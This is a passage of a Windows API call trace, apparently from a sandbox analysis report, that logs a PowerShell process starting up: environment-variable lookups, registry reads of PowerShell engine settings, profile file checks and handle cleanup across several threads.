	[0569.885] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19ae70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0569.885] CoTaskMemFree (pv=0x19ae70) 
	[0569.885] CoTaskMemAlloc (cb=0x104) returned 0x19ae70
	[0569.885] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19ae70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0569.885] CoTaskMemFree (pv=0x19ae70) 
	[0571.402] CoTaskMemAlloc (cb=0x104) returned 0x19ae70
	[0571.402] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19ae70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0571.402] CoTaskMemFree (pv=0x19ae70) 
	[0571.408] CoTaskMemAlloc (cb=0x104) returned 0x19ae70
	[0571.408] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19ae70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0571.408] CoTaskMemFree (pv=0x19ae70) 
	[0571.410] CoTaskMemAlloc (cb=0x104) returned 0x19ae70
	[0571.410] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19ae70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0571.410] CoTaskMemFree (pv=0x19ae70) 
	[0571.417] VirtualQuery (in: lpAddress=0xaba50, lpBuffer=0xac910, dwLength=0x30 | out: lpBuffer=0xac910*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0576.087] VirtualQuery (in: lpAddress=0xaba50, lpBuffer=0xac910, dwLength=0x30 | out: lpBuffer=0xac910*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0576.096] CoTaskMemAlloc (cb=0x104) returned 0x19ae70
	[0576.097] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19ae70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0576.097] CoTaskMemFree (pv=0x19ae70) 
	[0579.553] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x19b2b0
	[0579.555] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x19b3c0
	[0591.030] CoTaskMemAlloc (cb=0x104) returned 0x19b4d0
	[0591.030] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19b4d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0591.030] CoTaskMemFree (pv=0x19b4d0) 
	[0591.032] CoTaskMemAlloc (cb=0x104) returned 0x19b4d0
	[0591.032] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19b4d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0591.032] CoTaskMemFree (pv=0x19b4d0) 
	[0591.051] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac6b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0591.051] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0591.051] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0591.051] VirtualQuery (in: lpAddress=0xabd00, lpBuffer=0xacbc0, dwLength=0x30 | out: lpBuffer=0xacbc0*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0592.400] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac690, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0592.400] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0592.400] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0592.401] VirtualQuery (in: lpAddress=0xabd00, lpBuffer=0xacbc0, dwLength=0x30 | out: lpBuffer=0xacbc0*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0592.401] VirtualQuery (in: lpAddress=0xab550, lpBuffer=0xac410, dwLength=0x30 | out: lpBuffer=0xac410*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0592.402] VirtualQuery (in: lpAddress=0xab550, lpBuffer=0xac410, dwLength=0x30 | out: lpBuffer=0xac410*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0592.403] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xadb58 | out: phkResult=0xadb58*=0x38c) returned 0x0
	[0592.403] RegQueryValueExW (in: hKey=0x38c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xadadc, lpData=0x0, lpcbData=0xadad8*=0x0 | out: lpType=0xadadc*=0x1, lpData=0x0, lpcbData=0xadad8*=0x56) returned 0x0
	[0592.403] CoTaskMemAlloc (cb=0x5a) returned 0x1b90f510
	[0592.404] RegQueryValueExW (in: hKey=0x38c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xadaac, lpData=0x1b90f510, lpcbData=0xadaa8*=0x56 | out: lpType=0xadaac*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xadaa8*=0x56) returned 0x0
	[0592.404] CoTaskMemFree (pv=0x1b90f510) 
	[0592.404] RegCloseKey (hKey=0x38c) returned 0x0
	[0592.404] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xadb58 | out: phkResult=0xadb58*=0x38c) returned 0x0
	[0592.404] RegQueryValueExW (in: hKey=0x38c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xadadc, lpData=0x0, lpcbData=0xadad8*=0x0 | out: lpType=0xadadc*=0x1, lpData=0x0, lpcbData=0xadad8*=0x56) returned 0x0
	[0592.404] CoTaskMemAlloc (cb=0x5a) returned 0x1b90f510
	[0592.404] RegQueryValueExW (in: hKey=0x38c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xadaac, lpData=0x1b90f510, lpcbData=0xadaa8*=0x56 | out: lpType=0xadaac*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xadaa8*=0x56) returned 0x0
	[0592.404] CoTaskMemFree (pv=0x1b90f510) 
	[0592.404] RegCloseKey (hKey=0x38c) returned 0x0
	[0592.404] CoTaskMemAlloc (cb=0x20c) returned 0x1b8e0970
	[0592.404] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1b8e0970 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0592.405] CoTaskMemFree (pv=0x1b8e0970) 
	[0592.405] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0xad710, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0592.405] CoTaskMemAlloc (cb=0x20c) returned 0x1b8e0970
	[0592.405] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1b8e0970 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0592.405] CoTaskMemFree (pv=0x1b8e0970) 
	[0592.405] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0xad710, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0592.407] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", nBufferLength=0x105, lpBuffer=0xad8b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", lpFilePart=0x0) returned 0x36
	[0592.407] SetErrorMode (uMode=0x1) returned 0x1
	[0592.407] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0xadac0 | out: lpFileInformation=0xadac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0592.407] SetErrorMode (uMode=0x1) returned 0x1
	[0592.407] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0xad8b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x4b
	[0592.408] SetErrorMode (uMode=0x1) returned 0x1
	[0592.408] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0xadac0 | out: lpFileInformation=0xadac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0592.408] SetErrorMode (uMode=0x1) returned 0x1
	[0592.408] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", nBufferLength=0x105, lpBuffer=0xad8b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", lpFilePart=0x0) returned 0x45
	[0592.408] SetErrorMode (uMode=0x1) returned 0x1
	[0592.408] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0xadac0 | out: lpFileInformation=0xadac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0592.408] SetErrorMode (uMode=0x1) returned 0x1
	[0592.408] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0xad8b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x5a
	[0592.408] SetErrorMode (uMode=0x1) returned 0x1
	[0592.408] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0xadac0 | out: lpFileInformation=0xadac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0592.408] SetErrorMode (uMode=0x1) returned 0x1
	[0592.411] CoTaskMemAlloc (cb=0x104) returned 0x19b4d0
	[0592.411] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19b4d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0592.411] CoTaskMemFree (pv=0x19b4d0) 
	[0592.412] CoTaskMemAlloc (cb=0x104) returned 0x19b4d0
	[0592.412] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19b4d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0592.412] CoTaskMemFree (pv=0x19b4d0) 
	[0592.412] CoTaskMemAlloc (cb=0x104) returned 0x19b4d0
	[0592.412] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19b4d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0592.412] CoTaskMemFree (pv=0x19b4d0) 
	[0592.413] CoTaskMemAlloc (cb=0x104) returned 0x19b4d0
	[0592.413] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19b4d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0592.413] CoTaskMemFree (pv=0x19b4d0) 
	[0592.417] CoTaskMemAlloc (cb=0x104) returned 0x19b4d0
	[0592.417] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19b4d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0592.417] CoTaskMemFree (pv=0x19b4d0) 
	[0592.418] CoTaskMemAlloc (cb=0x104) returned 0x19b4d0
	[0592.418] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19b4d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0592.418] CoTaskMemFree (pv=0x19b4d0) 
	[0592.420] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
	[0592.420] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0xadca0 | out: lpMode=0xadca0) returned 1
	[0592.422] CoTaskMemAlloc (cb=0x104) returned 0x19b4d0
	[0592.422] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19b4d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0592.422] CoTaskMemFree (pv=0x19b4d0) 
	[0592.425] SetEvent (hEvent=0x1c0) returned 1
	[0592.425] SetEvent (hEvent=0x38c) returned 1
	[0592.426] SetEvent (hEvent=0x2fc) returned 1
	[0592.426] SetEvent (hEvent=0x300) returned 1
	[0592.426] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x348
	[0592.428] CoTaskMemAlloc (cb=0x104) returned 0x19b4d0
	[0592.428] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19b4d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0592.428] CoTaskMemFree (pv=0x19b4d0) 
	[0592.429] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0xad9f8 | out: phkResult=0xad9f8*=0x34c) returned 0x0
	[0592.429] RegQueryValueExW (in: hKey=0x34c, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0xad97c, lpData=0x0, lpcbData=0xad978*=0x0 | out: lpType=0xad97c*=0x0, lpData=0x0, lpcbData=0xad978*=0x0) returned 0x2

Thread:
	id = 429
	os_tid = 0x10a0


Thread:
	id = 432
	os_tid = 0x10ac


Thread:
	id = 770
	os_tid = 0x17c0


Thread:
	id = 771
	os_tid = 0x17c4


Thread:
	id = 793
	os_tid = 0x1028


Thread:
	id = 811
	os_tid = 0x1540


Thread:
	id = 814
	os_tid = 0x10a4

	[0460.907] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0525.817] LocalFree (hMem=0x1a72c0) returned 0x0
	[0525.818] CloseHandle (hObject=0x1c0) returned 1
	[0525.818] CloseHandle (hObject=0x13) returned 1
	[0525.818] CloseHandle (hObject=0xf) returned 1
	[0525.819] RegCloseKey (hKey=0x300) returned 0x0
	[0525.819] RegCloseKey (hKey=0x2fc) returned 0x0
	[0525.819] RegCloseKey (hKey=0x2f8) returned 0x0
	[0525.820] LocalFree (hMem=0x1a7290) returned 0x0
	[0525.820] RegCloseKey (hKey=0x324) returned 0x0
	[0542.909] RegCloseKey (hKey=0x324) returned 0x0
	[0549.407] RegCloseKey (hKey=0x324) returned 0x0
	[0574.642] RegCloseKey (hKey=0x388) returned 0x0
	[0574.642] RegCloseKey (hKey=0x384) returned 0x0
	[0574.642] RegCloseKey (hKey=0x360) returned 0x0
	[0574.643] RegCloseKey (hKey=0x39c) returned 0x0
	[0574.643] RegCloseKey (hKey=0x37c) returned 0x0
	[0574.643] RegCloseKey (hKey=0x378) returned 0x0
	[0574.643] RegCloseKey (hKey=0x374) returned 0x0
	[0574.644] RegCloseKey (hKey=0x370) returned 0x0
	[0574.644] RegCloseKey (hKey=0x36c) returned 0x0
	[0574.644] RegCloseKey (hKey=0x368) returned 0x0
	[0574.645] RegCloseKey (hKey=0x364) returned 0x0
	[0574.645] RegCloseKey (hKey=0x30c) returned 0x0
	[0574.645] RegCloseKey (hKey=0x398) returned 0x0
	[0574.645] RegCloseKey (hKey=0x394) returned 0x0
	[0574.646] RegCloseKey (hKey=0x35c) returned 0x0
	[0574.646] RegCloseKey (hKey=0x358) returned 0x0
	[0574.646] RegCloseKey (hKey=0x354) returned 0x0
	[0574.646] RegCloseKey (hKey=0x350) returned 0x0
	[0574.647] RegCloseKey (hKey=0x34c) returned 0x0
	[0574.647] RegCloseKey (hKey=0x348) returned 0x0
	[0574.647] RegCloseKey (hKey=0x344) returned 0x0
	[0574.647] RegCloseKey (hKey=0x310) returned 0x0
	[0574.648] RegCloseKey (hKey=0x390) returned 0x0
	[0574.648] RegCloseKey (hKey=0x338) returned 0x0
	[0574.648] RegCloseKey (hKey=0x334) returned 0x0
	[0574.649] RegCloseKey (hKey=0x330) returned 0x0
	[0574.649] RegCloseKey (hKey=0x32c) returned 0x0
	[0574.649] RegCloseKey (hKey=0x328) returned 0x0
	[0574.649] RegCloseKey (hKey=0x1c0) returned 0x0
	[0574.650] RegCloseKey (hKey=0x300) returned 0x0
	[0574.650] RegCloseKey (hKey=0x2fc) returned 0x0
	[0574.650] RegCloseKey (hKey=0x38c) returned 0x0
	[0574.650] RegCloseKey (hKey=0x324) returned 0x0
	[0606.646] RegCloseKey (hKey=0x34c) returned 0x0

Thread:
	id = 905
	os_tid = 0x1828


Thread:
	id = 1184
	os_tid = 0x1848

	[0593.456] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0593.511] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409
	[0593.516] CoTaskMemAlloc (cb=0x104) returned 0x19b4d0
	[0593.516] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19b4d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0593.516] CoTaskMemFree (pv=0x19b4d0) 
	[0593.518] VirtualQuery (in: lpAddress=0x1c7cd8c0, lpBuffer=0x1c7ce780, dwLength=0x30 | out: lpBuffer=0x1c7ce780*(BaseAddress=0x1c7cd000, AllocationBase=0x1be40000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0593.521] CoTaskMemAlloc (cb=0x104) returned 0x19b4d0
	[0593.521] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19b4d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0593.521] CoTaskMemFree (pv=0x19b4d0) 
	[0593.524] CoTaskMemAlloc (cb=0x104) returned 0x19b4d0
	[0593.524] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19b4d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0593.524] CoTaskMemFree (pv=0x19b4d0) 
	[0593.527] CoTaskMemAlloc (cb=0x104) returned 0x19b4d0
	[0593.527] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19b4d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0593.527] CoTaskMemFree (pv=0x19b4d0) 
	[0593.537] CoTaskMemAlloc (cb=0x104) returned 0x19b4d0
	[0593.537] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19b4d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0593.537] CoTaskMemFree (pv=0x19b4d0) 
	[0593.540] CoTaskMemAlloc (cb=0x104) returned 0x19b4d0
	[0593.540] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19b4d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0593.540] CoTaskMemFree (pv=0x19b4d0) 
	[0593.541] CoTaskMemAlloc (cb=0x104) returned 0x19b4d0
	[0593.541] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19b4d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0593.541] CoTaskMemFree (pv=0x19b4d0) 
	[0593.546] VirtualQuery (in: lpAddress=0x1c7cdb70, lpBuffer=0x1c7cea30, dwLength=0x30 | out: lpBuffer=0x1c7cea30*(BaseAddress=0x1c7cd000, AllocationBase=0x1be40000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0593.547] CoTaskMemAlloc (cb=0x104) returned 0x19b4d0
	[0593.547] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19b4d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0593.547] CoTaskMemFree (pv=0x19b4d0) 
	[0593.550] CoTaskMemAlloc (cb=0x104) returned 0x19b4d0
	[0593.550] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19b4d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0593.550] CoTaskMemFree (pv=0x19b4d0) 
	[0593.550] CoTaskMemAlloc (cb=0x104) returned 0x19b4d0
	[0593.550] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19b4d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0593.550] CoTaskMemFree (pv=0x19b4d0) 
	[0593.552] CoTaskMemAlloc (cb=0x104) returned 0x19b4d0
	[0593.552] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19b4d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0594.669] CoTaskMemFree (pv=0x19b4d0) 
	[0594.674] CoTaskMemAlloc (cb=0x104) returned 0x19b4d0
	[0594.674] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19b4d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0594.674] CoTaskMemFree (pv=0x19b4d0) 
	[0595.665] CoTaskMemAlloc (cb=0x104) returned 0x19b4d0
	[0595.665] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19b4d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0595.665] CoTaskMemFree (pv=0x19b4d0) 
	[0595.668] CoTaskMemAlloc (cb=0x104) returned 0x19b4d0
	[0595.668] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19b4d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0595.668] CoTaskMemFree (pv=0x19b4d0) 
	[0595.669] CoTaskMemAlloc (cb=0x104) returned 0x19b4d0
	[0595.669] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19b4d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0595.669] CoTaskMemFree (pv=0x19b4d0) 
	[0595.672] CoTaskMemAlloc (cb=0x104) returned 0x19b4d0
	[0595.672] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19b4d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0595.672] CoTaskMemFree (pv=0x19b4d0) 
	[0595.673] CoTaskMemAlloc (cb=0x104) returned 0x19b4d0
	[0595.673] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19b4d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0595.673] CoTaskMemFree (pv=0x19b4d0) 
	[0595.675] CoTaskMemAlloc (cb=0x104) returned 0x19b4d0
	[0595.675] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19b4d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0595.675] CoTaskMemFree (pv=0x19b4d0) 
	[0595.677] CoTaskMemAlloc (cb=0x104) returned 0x19b4d0
	[0595.677] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19b4d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0595.677] CoTaskMemFree (pv=0x19b4d0) 
	[0596.614] CoTaskMemAlloc (cb=0x104) returned 0x19b4d0
	[0596.614] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19b4d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0596.614] CoTaskMemFree (pv=0x19b4d0) 
	[0597.786] CoTaskMemAlloc (cb=0x104) returned 0x19b4d0
	[0597.786] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x19b4d0, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0597.786] CoTaskMemFree (pv=0x19b4d0) 
	[0597.789] CoTaskMemAlloc (cb=0x104) returned 0x19b4d0
	[0597.789] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x19b4d0, nSize=0x80 | out: lpBuffer="") returned 0x92
	[0597.789] CoTaskMemFree (pv=0x19b4d0) 
	[0597.789] CoTaskMemAlloc (cb=0x128) returned 0x1b90d190
	[0597.789] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x1b90d190, nSize=0x92 | out: lpBuffer="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x91
	[0597.789] CoTaskMemFree (pv=0x1b90d190) 
	[0597.794] CoTaskMemAlloc (cb=0x20e) returned 0x1b8e25e0
	[0597.794] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1b8e25e0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0597.794] CoTaskMemFree (pv=0x1b8e25e0) 
